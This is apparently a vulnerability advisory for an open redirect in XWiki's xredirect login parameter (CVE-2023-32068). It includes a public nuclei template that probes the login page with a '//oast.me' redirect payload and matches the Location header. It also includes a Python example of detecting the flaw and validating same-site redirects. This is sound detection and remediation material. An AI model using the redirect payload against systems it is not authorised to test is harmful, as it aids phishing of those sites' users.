CVE-2023-32068: XWiki - Open Redirect

Date: 2025-08-01 | Affected software: XWiki | PoC: public

Vulnerability description

XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.

PoC code [public]

id: CVE-2023-32068

info:
  name: XWiki - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
  impact: |
    An attacker can craft malicious URLs to redirect users to malicious websites.
  remediation: |
    Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20096
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32068
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-32068
    cwe-id: CWE-601
    epss-score: 0.65025
    epss-percentile: 0.98426
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2023,xwiki,redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4a0a00473045022100873eaf03c7594766fd8b0cc625d734e9d5ab0c273f32e84bcb275ce2e5f3fab602206c308caae118c304aa9ab8b5b219b6da78f60ebbd5bfbaa0d7ebea370e1526cf:922c64590222798bb761d5b6d8e72950

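As an added example (not XWiki's code and not part of the nuclei template above), the following Python shows both sides of the CWE-601 issue in this advisory: the Location-header check that the template's regex matcher performs, run over constructed sample responses, and a validator for a post-login redirect parameter such as xredirect that honours only same-site paths, rejecting the absolute, protocol-relative, backslash and repeated-slash forms that browsers resolve to a foreign host. The function names, the default landing path and the sample responses are assumptions made for this illustration.

```python
"""Added example: detecting and preventing an open redirect on a
post-login parameter such as XWiki's xredirect. Not XWiki's own code."""
import re
from urllib.parse import urlsplit

# Regex copied from the template's matcher above: it fires when the
# Location header sends the browser to oast.me (nuclei's out-of-band
# domain) with an http(s) scheme, a protocol-relative '//' or no scheme.
LOCATION_MATCHER = re.compile(
    r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
)


def template_matches(raw_headers: str) -> bool:
    """True when the response headers would satisfy the template's matcher."""
    return LOCATION_MATCHER.search(raw_headers) is not None


def is_safe_redirect(target: str) -> bool:
    """Accept only an absolute-path redirect that stays on the current site.

    Everything that can carry a host (scheme, '//', '\\', '///') is refused;
    the caller falls back to a fixed landing page instead.
    """
    if not target or len(target) > 2048:
        return False
    # Control characters and whitespace let a value be parsed differently by
    # the server and the browser, so refuse them outright.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False
    # Browsers treat '\' as '/' in http(s) URLs, so '/\evil.example' is
    # really '//evil.example'. Normalise before parsing.
    normalised = target.replace('\\', '/')
    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:
        return False  # 'https://host/...', 'javascript:...', '//host'
    if not normalised.startswith('/'):
        return False  # 'evil.example' would be joined as a relative path
    # Browsers collapse any run of leading slashes into an authority
    # ('///evil.example' becomes https://evil.example/), while urlsplit
    # reports no netloc for it, so check the prefix as well.
    if normalised.startswith('//'):
        return False
    return True


# Assumed default landing page; a real deployment would use its own.
DEFAULT_LANDING = '/bin/view/Main/'


def safe_redirect_target(target: str, default: str = DEFAULT_LANDING) -> str:
    """Return the requested target if it is same-site, else the default."""
    return target if is_safe_redirect(target) else default


# Constructed sample responses, as a vulnerable and a fixed server would emit.
VULNERABLE_RESPONSE = 'HTTP/1.1 302 Found\r\nLocation: //oast.me\r\n\r\n'
FIXED_RESPONSE = 'HTTP/1.1 302 Found\r\nLocation: /bin/view/Main/\r\n\r\n'

if __name__ == '__main__':
    for raw in (VULNERABLE_RESPONSE, FIXED_RESPONSE):
        print(repr(raw.splitlines()[1]), '->', 'matched' if template_matches(raw) else 'clean')
    for value in ('/bin/view/Main/', '//oast.me', 'https://oast.me/', '/\\oast.me',
                  '///oast.me', 'javascript:alert(1)', 'oast.me'):
        print(repr(value), '->', safe_redirect_target(value))
```

Only the prefix check on the normalised value catches the triple-slash case, because Python's urlsplit and the WHATWG parser used by browsers disagree about it; an allow-list of same-site paths is therefore safer than trying to enumerate hostile shapes.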